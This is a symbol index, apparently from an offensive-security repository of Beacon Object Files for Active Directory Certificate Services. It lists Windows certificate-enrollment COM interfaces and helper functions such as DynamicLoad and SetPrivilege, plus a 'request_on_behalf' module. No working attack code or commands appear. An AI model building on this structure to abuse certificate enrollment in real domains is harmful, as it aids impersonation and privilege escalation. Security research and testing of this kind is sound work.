type ICertPropertyDescriptionVtbl (line 13608) | typedef struct ICertPropertyDescriptionVtbl
function interface (line 13708) | interface ICertPropertyDescription
type ICertPropertyAutoEnrollVtbl (line 13806) | typedef struct ICertPropertyAutoEnrollVtbl
function interface (line 13906) | interface ICertPropertyAutoEnroll
type ICertPropertyRequestOriginatorVtbl (line 14006) | typedef struct ICertPropertyRequestOriginatorVtbl
function interface (line 14109) | interface ICertPropertyRequestOriginator
type ICertPropertySHA1HashVtbl (line 14212) | typedef struct ICertPropertySHA1HashVtbl
function interface (line 14314) | interface ICertPropertySHA1Hash
type ICertPropertyKeyProvInfoVtbl (line 14412) | typedef struct ICertPropertyKeyProvInfoVtbl
function interface (line 14512) | interface ICertPropertyKeyProvInfo
type ICertPropertyArchivedVtbl (line 14610) | typedef struct ICertPropertyArchivedVtbl
function interface (line 14710) | interface ICertPropertyArchived
type ICertPropertyBackedUpVtbl (line 14815) | typedef struct ICertPropertyBackedUpVtbl
function interface (line 14924) | interface ICertPropertyBackedUp
type ICertPropertyEnrollmentVtbl (line 15040) | typedef struct ICertPropertyEnrollmentVtbl
function interface (line 15155) | interface ICertPropertyEnrollment
type ICertPropertyRenewalVtbl (line 15269) | typedef struct ICertPropertyRenewalVtbl
function interface (line 15377) | interface ICertPropertyRenewal
type ICertPropertyArchivedKeyHashVtbl (line 15480) | typedef struct ICertPropertyArchivedKeyHashVtbl
function interface (line 15582) | interface ICertPropertyArchivedKeyHash
type EnrollmentPolicyServerPropertyFlags (line 15657) | typedef
type PolicyServerUrlFlags (line 15664) | typedef
type ICertPropertyEnrollmentPolicyServerVtbl (line 15734) | typedef struct ICertPropertyEnrollmentPolicyServerVtbl
function interface (line 15869) | interface ICertPropertyEnrollmentPolicyServer
type IX509SignatureInformationVtbl (line 16024) | typedef struct IX509SignatureInformationVtbl
function interface (line 16135) | interface IX509SignatureInformation
type ISignerCertificateVtbl (line 16275) | typedef struct ISignerCertificateVtbl
function interface (line 16379) | interface ISignerCertificate
type ISignerCertificatesVtbl (line 16498) | typedef struct ISignerCertificatesVtbl
function interface (line 16583) | interface ISignerCertificates
type IX509NameValuePairVtbl (line 16678) | typedef struct IX509NameValuePairVtbl
function interface (line 16747) | interface IX509NameValuePair
type IX509NameValuePairsVtbl (line 16838) | typedef struct IX509NameValuePairsVtbl
function interface (line 16918) | interface IX509NameValuePairs
type EnrollmentTemplateProperty (line 16983) | typedef
type EnrollmentTemplateProperty (line 17040) | enum EnrollmentTemplateProperty
type IX509CertificateTemplateVtbl (line 17048) | typedef struct IX509CertificateTemplateVtbl
function interface (line 17109) | interface IX509CertificateTemplate
type IX509CertificateTemplatesVtbl (line 17202) | typedef struct IX509CertificateTemplatesVtbl
function interface (line 17292) | interface IX509CertificateTemplates
type CommitTemplateFlags (line 17363) | typedef
type EnrollmentTemplateProperty (line 17400) | enum EnrollmentTemplateProperty
type EnrollmentTemplateProperty (line 17404) | enum EnrollmentTemplateProperty
type IX509CertificateTemplateWritableVtbl (line 17415) | typedef struct IX509CertificateTemplateWritableVtbl
function interface (line 17494) | interface IX509CertificateTemplateWritable
type EnrollmentCAProperty (line 17556) | typedef
type EnrollmentCAProperty (line 17594) | enum EnrollmentCAProperty
type ICertificationAuthorityVtbl (line 17602) | typedef struct ICertificationAuthorityVtbl
function interface (line 17663) | interface ICertificationAuthority
type ICertificationAuthoritiesVtbl (line 17754) | typedef struct ICertificationAuthoritiesVtbl
function interface (line 17842) | interface ICertificationAuthorities
type X509EnrollmentPolicyLoadOption (line 17913) | typedef
type EnrollmentPolicyFlags (line 17923) | enum EnrollmentPolicyFlags
type PolicyServerUrlPropertyID (line 17928) | typedef
type X509EnrollmentPolicyExportFlags (line 17935) | typedef
type IX509EnrollmentPolicyServerVtbl (line 18048) | typedef struct IX509EnrollmentPolicyServerVtbl
function interface (line 18208) | interface IX509EnrollmentPolicyServer
type IX509PolicyServerUrlVtbl (line 18391) | typedef struct IX509PolicyServerUrlVtbl
function interface (line 18509) | interface IX509PolicyServerUrl
type IX509PolicyServerListManagerVtbl (line 18640) | typedef struct IX509PolicyServerListManagerVtbl
function interface (line 18725) | interface IX509PolicyServerListManager
type X509RequestType (line 18793) | typedef
type X509RequestInheritOptions (line 18803) | typedef
type InnerRequestLevel (line 18822) | typedef
type IX509CertificateRequestVtbl (line 18931) | typedef struct IX509CertificateRequestVtbl
function interface (line 19089) | interface IX509CertificateRequest
type Pkcs10AllowedSignatureTypes (line 19211) | typedef
type IX509CertificateRequestPkcs10Vtbl (line 19340) | typedef struct IX509CertificateRequestPkcs10Vtbl
function interface (line 19623) | interface IX509CertificateRequestPkcs10
type IX509CertificateRequestPkcs10V2Vtbl (line 19870) | typedef struct IX509CertificateRequestPkcs10V2Vtbl
function interface (line 20181) | interface IX509CertificateRequestPkcs10V2
type IX509CertificateRequestPkcs10V3Vtbl (line 20456) | typedef struct IX509CertificateRequestPkcs10V3Vtbl
function interface (line 20813) | interface IX509CertificateRequestPkcs10V3
type KeyAttestationClaimType (line 21070) | typedef
type IX509CertificateRequestPkcs10V4Vtbl (line 21117) | typedef struct IX509CertificateRequestPkcs10V4Vtbl
function interface (line 21490) | interface IX509CertificateRequestPkcs10V4
type IX509CertificateRequestCertificateVtbl (line 21812) | typedef struct IX509CertificateRequestCertificateVtbl
function interface (line 22141) | interface IX509CertificateRequestCertificate
type IX509CertificateRequestCertificate2Vtbl (line 22416) | typedef struct IX509CertificateRequestCertificate2Vtbl
function interface (line 22766) | interface IX509CertificateRequestCertificate2
type IX509CertificateRequestPkcs7Vtbl (line 23067) | typedef struct IX509CertificateRequestPkcs7Vtbl
function interface (line 23263) | interface IX509CertificateRequestPkcs7
type IX509CertificateRequestPkcs7V2Vtbl (line 23441) | typedef struct IX509CertificateRequestPkcs7V2Vtbl
function interface (line 23655) | interface IX509CertificateRequestPkcs7V2
type IX509CertificateRequestCmcVtbl (line 23907) | typedef struct IX509CertificateRequestCmcVtbl
function interface (line 24201) | interface IX509CertificateRequestCmc
type IX509CertificateRequestCmc2Vtbl (line 24458) | typedef struct IX509CertificateRequestCmc2Vtbl
function interface (line 24781) | interface IX509CertificateRequestCmc2
type InstallResponseRestrictionFlags (line 25017) | typedef
type IX509EnrollmentVtbl (line 25129) | typedef struct IX509EnrollmentVtbl
function interface (line 25286) | interface IX509Enrollment
type IX509Enrollment2Vtbl (line 25443) | typedef struct IX509Enrollment2Vtbl
function interface (line 25629) | interface IX509Enrollment2
type WebEnrollmentFlags (line 25761) | typedef
type IX509EnrollmentHelperVtbl (line 25816) | typedef struct IX509EnrollmentHelperVtbl
function interface (line 25900) | interface IX509EnrollmentHelper
type IX509EnrollmentWebClassFactoryVtbl (line 25980) | typedef struct IX509EnrollmentWebClassFactoryVtbl
function interface (line 26041) | interface IX509EnrollmentWebClassFactory
type IX509MachineEnrollmentFactoryVtbl (line 26112) | typedef struct IX509MachineEnrollmentFactoryVtbl
function interface (line 26173) | interface IX509MachineEnrollmentFactory
type CRLRevocationReason (line 26223) | typedef
type IX509CertificateRevocationListEntryVtbl (line 26287) | typedef struct IX509CertificateRevocationListEntryVtbl
function interface (line 26374) | interface IX509CertificateRevocationListEntry
type IX509CertificateRevocationListEntriesVtbl (line 26485) | typedef struct IX509CertificateRevocationListEntriesVtbl
function interface (line 26575) | interface IX509CertificateRevocationListEntries
type IX509CertificateRevocationListVtbl (line 26758) | typedef struct IX509CertificateRevocationListVtbl
function interface (line 26940) | interface IX509CertificateRevocationList
type ICertificateAttestationChallengeVtbl (line 27108) | typedef struct ICertificateAttestationChallengeVtbl
function interface (line 27178) | interface ICertificateAttestationChallenge
type ICertificateAttestationChallenge2Vtbl (line 27258) | typedef struct ICertificateAttestationChallenge2Vtbl
function interface (line 27337) | interface ICertificateAttestationChallenge2
type IX509SCEPEnrollmentVtbl (line 27499) | typedef struct IX509SCEPEnrollmentVtbl
function interface (line 27659) | interface IX509SCEPEnrollment
type X509SCEPProcessMessageFlags (line 27772) | typedef
type DelayRetryAction (line 27779) | typedef
type IX509SCEPEnrollment2Vtbl (line 27837) | typedef struct IX509SCEPEnrollment2Vtbl
function interface (line 28025) | interface IX509SCEPEnrollment2
type IX509SCEPEnrollmentHelperVtbl (line 28200) | typedef struct IX509SCEPEnrollmentHelperVtbl
function interface (line 28288) | interface IX509SCEPEnrollmentHelper
type X509CertificateTemplateGeneralFlag (line 28357) | typedef
type X509CertificateTemplateEnrollmentFlag (line 28368) | typedef
type X509CertificateTemplateSubjectNameFlag (line 28392) | typedef
type X509CertificateTemplatePrivateKeyFlag (line 28410) | typedef
type ImportPFXFlags (line 29061) | typedef
type HRESULT (line 29080) | typedef HRESULT (FNIMPORTPFXTOPROVIDER)(
type VOID (line 29093) | typedef VOID (FNIMPORTPFXTOPROVIDERFREEDATA)(
FILE: AD-BOF/ADCS-BOF/src/request/entry.c
function VOID (line 10) | VOID go(
function main (line 88) | int main(int argc, char ** argv)
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/CertCli.h
type interface (line 44) | typedef interface ICertGetConfig
type interface (line 51) | typedef interface ICertConfig
type interface (line 58) | typedef interface ICertConfig2
type interface (line 65) | typedef interface ICertRequest
type interface (line 72) | typedef interface ICertRequest2
type interface (line 79) | typedef interface ICertRequest3
type class (line 88) | typedef class CCertGetConfig
type CCertGetConfig (line 90) | typedef struct CCertGetConfig CCertGetConfig;
type class (line 100) | typedef class CCertConfig
type CCertConfig (line 102) | typedef struct CCertConfig CCertConfig;
type class (line 112) | typedef class CCertRequest
type CCertRequest (line 114) | typedef struct CCertRequest CCertRequest;
type class (line 124) | typedef class CCertServerPolicy
type CCertServerPolicy (line 126) | typedef struct CCertServerPolicy CCertServerPolicy;
type class (line 136) | typedef class CCertServerExit
type CCertServerExit (line 138) | typedef struct CCertServerExit CCertServerExit;
type ICertGetConfigVtbl (line 188) | typedef struct ICertGetConfigVtbl
function interface (line 249) | interface ICertGetConfig
type ICertConfigVtbl (line 331) | typedef struct ICertConfigVtbl
function interface (line 406) | interface ICertConfig
type ICertConfig2Vtbl (line 485) | typedef struct ICertConfig2Vtbl
function interface (line 564) | interface ICertConfig2
type ICertRequestVtbl (line 675) | typedef struct ICertRequestVtbl
function interface (line 769) | interface ICertRequest
type ICertRequest2Vtbl (line 890) | typedef struct ICertRequest2Vtbl
function interface (line 1026) | interface ICertRequest2
type X509EnrollmentAuthFlags (line 1113) | typedef
type ICertRequest3Vtbl (line 1166) | typedef struct ICertRequest3Vtbl
function interface (line 1324) | interface ICertRequest3
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/CertPol.h
type interface (line 44) | typedef interface ICertPolicy
type interface (line 51) | typedef interface ICertPolicy2
type interface (line 58) | typedef interface INDESPolicy
type ICertPolicyVtbl (line 120) | typedef struct ICertPolicyVtbl
function interface (line 195) | interface ICertPolicy
type ICertPolicy2Vtbl (line 274) | typedef struct ICertPolicy2Vtbl
function interface (line 353) | interface ICertPolicy2
type X509SCEPMessageType (line 416) | typedef
type X509SCEPDisposition (line 428) | typedef
type X509SCEPFailInfo (line 438) | typedef
type INDESPolicyVtbl (line 497) | typedef struct INDESPolicyVtbl
function interface (line 544) | interface INDESPolicy
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/base.c
function bofstart (line 25) | int bofstart()
function internal_printf (line 36) | void internal_printf(const char* format, ...){
function printoutput (line 83) | void printoutput(BOOL done)
type loadedLibrary (line 96) | typedef struct loadedLibrary {
function BOOL (line 103) | BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
function FARPROC (line 131) | FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
function wchar_t (line 207) | wchar_t* Utf8ToUtf16(const char* input)
function DWORD (line 247) | DWORD SetPrivilege(
function bofstop (line 322) | void bofstop()
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/certenroll.h
type interface (line 44) | typedef interface IObjectId IObjectId;
type interface (line 51) | typedef interface IObjectIds
type interface (line 58) | typedef interface IBinaryConverter
type interface (line 65) | typedef interface IBinaryConverter2
type interface (line 72) | typedef interface IX500DistinguishedName
type interface (line 79) | typedef interface IX509EnrollmentStatus
type interface (line 86) | typedef interface ICspAlgorithm
type interface (line 93) | typedef interface ICspAlgorithms
type interface (line 100) | typedef interface ICspInformation
type interface (line 107) | typedef interface ICspInformations
type interface (line 114) | typedef interface ICspStatus
type interface (line 121) | typedef interface ICspStatuses
type interface (line 128) | typedef interface IX509PublicKey
type interface (line 135) | typedef interface IX509PrivateKey
type interface (line 142) | typedef interface IX509PrivateKey2
type interface (line 149) | typedef interface IX509EndorsementKey
type interface (line 156) | typedef interface IX509Extension
type interface (line 163) | typedef interface IX509Extensions
type interface (line 170) | typedef interface IX509ExtensionKeyUsage
type interface (line 177) | typedef interface IX509ExtensionEnhancedKeyUsage
type interface (line 184) | typedef interface IX509ExtensionTemplateName
type interface (line 191) | typedef interface IX509ExtensionTemplate
type interface (line 198) | typedef interface IAlternativeName
type interface (line 205) | typedef interface IAlternativeNames
type interface (line 212) | typedef interface IX509ExtensionAlternativeNames
type interface (line 219) | typedef interface IX509ExtensionBasicConstraints
type interface (line 226) | typedef interface IX509ExtensionSubjectKeyIdentifier
type interface (line 233) | typedef interface IX509ExtensionAuthorityKeyIdentifier
type interface (line 240) | typedef interface ISmimeCapability
type interface (line 247) | typedef interface ISmimeCapabilities
type interface (line 254) | typedef interface IX509ExtensionSmimeCapabilities
type interface (line 261) | typedef interface IPolicyQualifier
type interface (line 268) | typedef interface IPolicyQualifiers
type interface (line 275) | typedef interface ICertificatePolicy
type interface (line 282) | typedef interface ICertificatePolicies
type interface (line 289) | typedef interface IX509ExtensionCertificatePolicies
type interface (line 296) | typedef interface IX509ExtensionMSApplicationPolicies
type interface (line 303) | typedef interface IX509Attribute
type interface (line 310) | typedef interface IX509Attributes
type interface (line 317) | typedef interface IX509AttributeExtensions
type interface (line 324) | typedef interface IX509AttributeClientId
type interface (line 331) | typedef interface IX509AttributeRenewalCertificate
type interface (line 338) | typedef interface IX509AttributeArchiveKey
type interface (line 345) | typedef interface IX509AttributeArchiveKeyHash
type interface (line 352) | typedef interface IX509AttributeOSVersion
type interface (line 359) | typedef interface IX509AttributeCspProvider
type interface (line 366) | typedef interface ICryptAttribute
type interface (line 373) | typedef interface ICryptAttributes
type interface (line 380) | typedef interface ICertProperty
type interface (line 387) | typedef interface ICertProperties
type interface (line 394) | typedef interface ICertPropertyFriendlyName
type interface (line 401) | typedef interface ICertPropertyDescription
type interface (line 408) | typedef interface ICertPropertyAutoEnroll
type interface (line 415) | typedef interface ICertPropertyRequestOriginator
type interface (line 422) | typedef interface ICertPropertySHA1Hash
type interface (line 429) | typedef interface ICertPropertyKeyProvInfo
type interface (line 436) | typedef interface ICertPropertyArchived
type interface (line 443) | typedef interface ICertPropertyBackedUp
type interface (line 450) | typedef interface ICertPropertyEnrollment
type interface (line 457) | typedef interface ICertPropertyRenewal
type interface (line 464) | typedef interface ICertPropertyArchivedKeyHash
type interface (line 471) | typedef interface ICertPropertyEnrollmentPolicyServer
type interface (line 478) | typedef interface IX509SignatureInformation
type interface (line 485) | typedef interface ISignerCertificate
type interface (line 492) | typedef interface ISignerCertificates
type interface (line 499) | typedef interface IX509NameValuePair
type interface (line 506) | typedef interface IX509NameValuePairs
type interface (line 513) | typedef interface IX509CertificateTemplate
type interface (line 520) | typedef interface IX509CertificateTemplates
type interface (line 527) | typedef interface IX509CertificateTemplateWritable
type interface (line 534) | typedef interface ICertificationAuthority
type interface (line 541) | typedef interface ICertificationAuthorities
type interface (line 548) | typedef interface IX509EnrollmentPolicyServer
type interface (line 555) | typedef interface IX509PolicyServerUrl
type interface (line 562) | typedef interface IX509PolicyServerListManager
type interface (line 569) | typedef interface IX509CertificateRequest
type interface (line 576) | typedef interface IX509CertificateRequestPkcs10
type interface (line 583) | typedef interface IX509CertificateRequestPkcs10V2
type interface (line 590) | typedef interface IX509CertificateRequestPkcs10V3
type interface (line 597) | typedef interface IX509CertificateRequestPkcs10V4
type interface (line 604) | typedef interface IX509CertificateRequestCertificate
type interface (line 611) | typedef interface IX509CertificateRequestCertificate2
type interface (line 618) | typedef interface IX509CertificateRequestPkcs7
type interface (line 625) | typedef interface IX509CertificateRequestPkcs7V2
type interface (line 632) | typedef interface IX509CertificateRequestCmc
type interface (line 639) | typedef interface IX509CertificateRequestCmc2
type interface (line 646) | typedef interface IX509Enrollment
type interface (line 653) | typedef interface IX509Enrollment2
type interface (line 660) | typedef interface IX509EnrollmentHelper
type interface (line 667) | typedef interface IX509EnrollmentWebClassFactory
type interface (line 674) | typedef interface IX509MachineEnrollmentFactory
type interface (line 681) | typedef interface IX509CertificateRevocationListEntry
type interface (line 688) | typedef interface IX509CertificateRevocationListEntries
type interface (line 695) | typedef interface IX509CertificateRevocationList
type interface (line 702) | typedef interface ICertificateAttestationChallenge
type interface (line 709) | typedef interface ICertificateAttestationChallenge2
type interface (line 716) | typedef interface IX509SCEPEnrollment
type interface (line 723) | typedef interface IX509SCEPEnrollment2
type interface (line 730) | typedef interface IX509SCEPEnrollmentHelper
type class (line 739) | typedef class CObjectId CObjectId;
type CObjectId (line 741) | typedef struct CObjectId CObjectId;
type class (line 751) | typedef class CObjectIds CObjectIds;
type CObjectIds (line 753) | typedef struct CObjectIds CObjectIds;
type class (line 763) | typedef class CBinaryConverter
type CBinaryConverter (line 765) | typedef struct CBinaryConverter CBinaryConverter;
type class (line 775) | typedef class CX500DistinguishedName
type CX500DistinguishedName (line 777) | typedef struct CX500DistinguishedName CX500DistinguishedName;
type class (line 787) | typedef class CCspInformation
type CCspInformation (line 789) | typedef struct CCspInformation CCspInformation;
type class (line 799) | typedef class CCspInformations
type CCspInformations (line 801) | typedef struct CCspInformations CCspInformations;
type class (line 811) | typedef class CCspStatus CCspStatus;
type CCspStatus (line 813) | typedef struct CCspStatus CCspStatus;
type class (line 823) | typedef class CX509PublicKey
type CX509PublicKey (line 825) | typedef struct CX509PublicKey CX509PublicKey;
type class (line 835) | typedef class CX509PrivateKey
type CX509PrivateKey (line 837) | typedef struct CX509PrivateKey CX509PrivateKey;
type class (line 847) | typedef class CX509EndorsementKey
type CX509EndorsementKey (line 849) | typedef struct CX509EndorsementKey CX509EndorsementKey;
type class (line 859) | typedef class CX509Extension
type CX509Extension (line 861) | typedef struct CX509Extension CX509Extension;
type class (line 871) | typedef class CX509Extensions
type CX509Extensions (line 873) | typedef struct CX509Extensions CX509Extensions;
type class (line 883) | typedef class CX509ExtensionKeyUsage
type CX509ExtensionKeyUsage (line 885) | typedef struct CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
type class (line 895) | typedef class CX509ExtensionEnhancedKeyUsage
type CX509ExtensionEnhancedKeyUsage (line 897) | typedef struct CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyU...
type class (line 907) | typedef class CX509ExtensionTemplateName
type CX509ExtensionTemplateName (line 909) | typedef struct CX509ExtensionTemplateName CX509ExtensionTemplateName;
type class (line 919) | typedef class CX509ExtensionTemplate
type CX509ExtensionTemplate (line 921) | typedef struct CX509ExtensionTemplate CX509ExtensionTemplate;
type class (line 931) | typedef class CAlternativeName
type CAlternativeName (line 933) | typedef struct CAlternativeName CAlternativeName;
type class (line 943) | typedef class CAlternativeNames
type CAlternativeNames (line 945) | typedef struct CAlternativeNames CAlternativeNames;
type class (line 955) | typedef class CX509ExtensionAlternativeNames
type CX509ExtensionAlternativeNames (line 957) | typedef struct CX509ExtensionAlternativeNames CX509ExtensionAlternativeN...
type class (line 967) | typedef class CX509ExtensionBasicConstraints
type CX509ExtensionBasicConstraints (line 969) | typedef struct CX509ExtensionBasicConstraints CX509ExtensionBasicConstra...
type class (line 979) | typedef class CX509ExtensionSubjectKeyIdentifier
type CX509ExtensionSubjectKeyIdentifier (line 981) | typedef struct CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectK...
type class (line 991) | typedef class CX509ExtensionAuthorityKeyIdentifier
type CX509ExtensionAuthorityKeyIdentifier (line 993) | typedef struct CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthor...
type class (line 1003) | typedef class CSmimeCapability
type CSmimeCapability (line 1005) | typedef struct CSmimeCapability CSmimeCapability;
type class (line 1015) | typedef class CSmimeCapabilities
type CSmimeCapabilities (line 1017) | typedef struct CSmimeCapabilities CSmimeCapabilities;
type class (line 1027) | typedef class CX509ExtensionSmimeCapabilities
type CX509ExtensionSmimeCapabilities (line 1029) | typedef struct CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabi...
type class (line 1039) | typedef class CPolicyQualifier
type CPolicyQualifier (line 1041) | typedef struct CPolicyQualifier CPolicyQualifier;
type class (line 1051) | typedef class CPolicyQualifiers
type CPolicyQualifiers (line 1053) | typedef struct CPolicyQualifiers CPolicyQualifiers;
type class (line 1063) | typedef class CCertificatePolicy
type CCertificatePolicy (line 1065) | typedef struct CCertificatePolicy CCertificatePolicy;
type class (line 1075) | typedef class CCertificatePolicies
type CCertificatePolicies (line 1077) | typedef struct CCertificatePolicies CCertificatePolicies;
type class (line 1087) | typedef class CX509ExtensionCertificatePolicies
type CX509ExtensionCertificatePolicies (line 1089) | typedef struct CX509ExtensionCertificatePolicies CX509ExtensionCertifica...
type class (line 1099) | typedef class CX509ExtensionMSApplicationPolicies
type CX509ExtensionMSApplicationPolicies (line 1101) | typedef struct CX509ExtensionMSApplicationPolicies CX509ExtensionMSAppli...
type class (line 1111) | typedef class CX509Attribute
type CX509Attribute (line 1113) | typedef struct CX509Attribute CX509Attribute;
type class (line 1123) | typedef class CX509Attributes
type CX509Attributes (line 1125) | typedef struct CX509Attributes CX509Attributes;
type class (line 1135) | typedef class CX509AttributeExtensions
type CX509AttributeExtensions (line 1137) | typedef struct CX509AttributeExtensions CX509AttributeExtensions;
type class (line 1147) | typedef class CX509AttributeClientId
type CX509AttributeClientId (line 1149) | typedef struct CX509AttributeClientId CX509AttributeClientId;
type class (line 1159) | typedef class CX509AttributeRenewalCertificate
type CX509AttributeRenewalCertificate (line 1161) | typedef struct CX509AttributeRenewalCertificate CX509AttributeRenewalCer...
type class (line 1171) | typedef class CX509AttributeArchiveKey
type CX509AttributeArchiveKey (line 1173) | typedef struct CX509AttributeArchiveKey CX509AttributeArchiveKey;
type class (line 1183) | typedef class CX509AttributeArchiveKeyHash
type CX509AttributeArchiveKeyHash (line 1185) | typedef struct CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
type class (line 1195) | typedef class CX509AttributeOSVersion
type CX509AttributeOSVersion (line 1197) | typedef struct CX509AttributeOSVersion CX509AttributeOSVersion;
type class (line 1207) | typedef class CX509AttributeCspProvider
type CX509AttributeCspProvider (line 1209) | typedef struct CX509AttributeCspProvider CX509AttributeCspProvider;
type class (line 1219) | typedef class CCryptAttribute
type CCryptAttribute (line 1221) | typedef struct CCryptAttribute CCryptAttribute;
type class (line 1231) | typedef class CCryptAttributes
type CCryptAttributes (line 1233) | typedef struct CCryptAttributes CCryptAttributes;
type class (line 1243) | typedef class CCertProperty
type CCertProperty (line 1245) | typedef struct CCertProperty CCertProperty;
type class (line 1255) | typedef class CCertProperties
type CCertProperties (line 1257) | typedef struct CCertProperties CCertProperties;
type class (line 1267) | typedef class CCertPropertyFriendlyName
type CCertPropertyFriendlyName (line 1269) | typedef struct CCertPropertyFriendlyName CCertPropertyFriendlyName;
type class (line 1279) | typedef class CCertPropertyDescription
type CCertPropertyDescription (line 1281) | typedef struct CCertPropertyDescription CCertPropertyDescription;
type class (line 1291) | typedef class CCertPropertyAutoEnroll
type CCertPropertyAutoEnroll (line 1293) | typedef struct CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
type class (line 1303) | typedef class CCertPropertyRequestOriginator
type CCertPropertyRequestOriginator (line 1305) | typedef struct CCertPropertyRequestOriginator CCertPropertyRequestOrigin...
type class (line 1315) | typedef class CCertPropertySHA1Hash
type CCertPropertySHA1Hash (line 1317) | typedef struct CCertPropertySHA1Hash CCertPropertySHA1Hash;
type class (line 1327) | typedef class CCertPropertyKeyProvInfo
type CCertPropertyKeyProvInfo (line 1329) | typedef struct CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
type class (line 1339) | typedef class CCertPropertyArchived
type CCertPropertyArchived (line 1341) | typedef struct CCertPropertyArchived CCertPropertyArchived;
type class (line 1351) | typedef class CCertPropertyBackedUp
type CCertPropertyBackedUp (line 1353) | typedef struct CCertPropertyBackedUp CCertPropertyBackedUp;
type class (line 1363) | typedef class CCertPropertyEnrollment
type CCertPropertyEnrollment (line 1365) | typedef struct CCertPropertyEnrollment CCertPropertyEnrollment;
type class (line 1375) | typedef class CCertPropertyRenewal
type CCertPropertyRenewal (line 1377) | typedef struct CCertPropertyRenewal CCertPropertyRenewal;
type class (line 1387) | typedef class CCertPropertyArchivedKeyHash
type CCertPropertyArchivedKeyHash (line 1389) | typedef struct CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
type class (line 1399) | typedef class CCertPropertyEnrollmentPolicyServer
type CCertPropertyEnrollmentPolicyServer (line 1401) | typedef struct CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollme...
type class (line 1411) | typedef class CSignerCertificate
type CSignerCertificate (line 1413) | typedef struct CSignerCertificate CSignerCertificate;
type class (line 1423) | typedef class CX509NameValuePair
type CX509NameValuePair (line 1425) | typedef struct CX509NameValuePair CX509NameValuePair;
type class (line 1435) | typedef class CCertificateAttestationChallenge
type CCertificateAttestationChallenge (line 1437) | typedef struct CCertificateAttestationChallenge CCertificateAttestationC...
type class (line 1447) | typedef class CX509CertificateRequestPkcs10
type CX509CertificateRequestPkcs10 (line 1449) | typedef struct CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
type class (line 1459) | typedef class CX509CertificateRequestCertificate
type CX509CertificateRequestCertificate (line 1461) | typedef struct CX509CertificateRequestCertificate CX509CertificateReques...
type class (line 1471) | typedef class CX509CertificateRequestPkcs7
type CX509CertificateRequestPkcs7 (line 1473) | typedef struct CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
type class (line 1483) | typedef class CX509CertificateRequestCmc
type CX509CertificateRequestCmc (line 1485) | typedef struct CX509CertificateRequestCmc CX509CertificateRequestCmc;
type class (line 1495) | typedef class CX509Enrollment
type CX509Enrollment (line 1497) | typedef struct CX509Enrollment CX509Enrollment;
type class (line 1507) | typedef class CX509EnrollmentWebClassFactory
type CX509EnrollmentWebClassFactory (line 1509) | typedef struct CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFac...
type class (line 1519) | typedef class CX509EnrollmentHelper
type CX509EnrollmentHelper (line 1521) | typedef struct CX509EnrollmentHelper CX509EnrollmentHelper;
type class (line 1531) | typedef class CX509MachineEnrollmentFactory
type CX509MachineEnrollmentFactory (line 1533) | typedef struct CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
type class (line 1543) | typedef class CX509EnrollmentPolicyActiveDirectory
type CX509EnrollmentPolicyActiveDirectory (line 1545) | typedef struct CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolic...
type class (line 1555) | typedef class CX509EnrollmentPolicyWebService
type CX509EnrollmentPolicyWebService (line 1557) | typedef struct CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebS...
type class (line 1567) | typedef class CX509PolicyServerListManager
type CX509PolicyServerListManager (line 1569) | typedef struct CX509PolicyServerListManager CX509PolicyServerListManager;
type class (line 1579) | typedef class CX509PolicyServerUrl
type CX509PolicyServerUrl (line 1581) | typedef struct CX509PolicyServerUrl CX509PolicyServerUrl;
type class (line 1591) | typedef class CX509CertificateTemplateADWritable
type CX509CertificateTemplateADWritable (line 1593) | typedef struct CX509CertificateTemplateADWritable CX509CertificateTempla...
type class (line 1603) | typedef class CX509CertificateRevocationListEntry
type CX509CertificateRevocationListEntry (line 1605) | typedef struct CX509CertificateRevocationListEntry CX509CertificateRevoc...
type class (line 1615) | typedef class CX509CertificateRevocationListEntries
type CX509CertificateRevocationListEntries (line 1617) | typedef struct CX509CertificateRevocationListEntries CX509CertificateRev...
type class (line 1627) | typedef class CX509CertificateRevocationList
type CX509CertificateRevocationList (line 1629) | typedef struct CX509CertificateRevocationList CX509CertificateRevocation...
type class (line 1639) | typedef class CX509SCEPEnrollment
type CX509SCEPEnrollment (line 1641) | typedef struct CX509SCEPEnrollment CX509SCEPEnrollment;
type class (line 1651) | typedef class CX509SCEPEnrollmentHelper
type CX509SCEPEnrollmentHelper (line 1653) | typedef struct CX509SCEPEnrollmentHelper CX509SCEPEnrollmentHelper;
type typedef (line 1677) | typedef typedef void VOID;
type CERTENROLL_OBJECTID (line 1681) | typedef
type WebSecurityLevel (line 2124) | typedef
type EncodingType (line 2133) | typedef
type PFXExportOptions (line 2160) | typedef
type ObjectIdGroupId (line 2168) | typedef
type ObjectIdPublicKeyFlags (line 2192) | typedef
type AlgorithmFlags (line 2200) | typedef
type IObjectIdVtbl (line 2261) | typedef struct IObjectIdVtbl
function interface (line 2354) | interface IObjectId
type IObjectIdsVtbl (line 2463) | typedef struct IObjectIdsVtbl
function interface (line 2547) | interface IObjectIds
type IBinaryConverterVtbl (line 2648) | typedef struct IBinaryConverterVtbl
function interface (line 2723) | interface IBinaryConverter
type IBinaryConverter2Vtbl (line 2804) | typedef struct IBinaryConverter2Vtbl
function interface (line 2889) | interface IBinaryConverter2
type X500NameFlags (line 2952) | typedef
type IX500DistinguishedNameVtbl (line 3018) | typedef struct IX500DistinguishedNameVtbl
function interface (line 3094) | interface IX500DistinguishedName
type X509CertificateEnrollmentContext (line 3153) | typedef
type EnrollmentEnrollStatus (line 3162) | typedef
type EnrollmentSelectionStatus (line 3174) | typedef
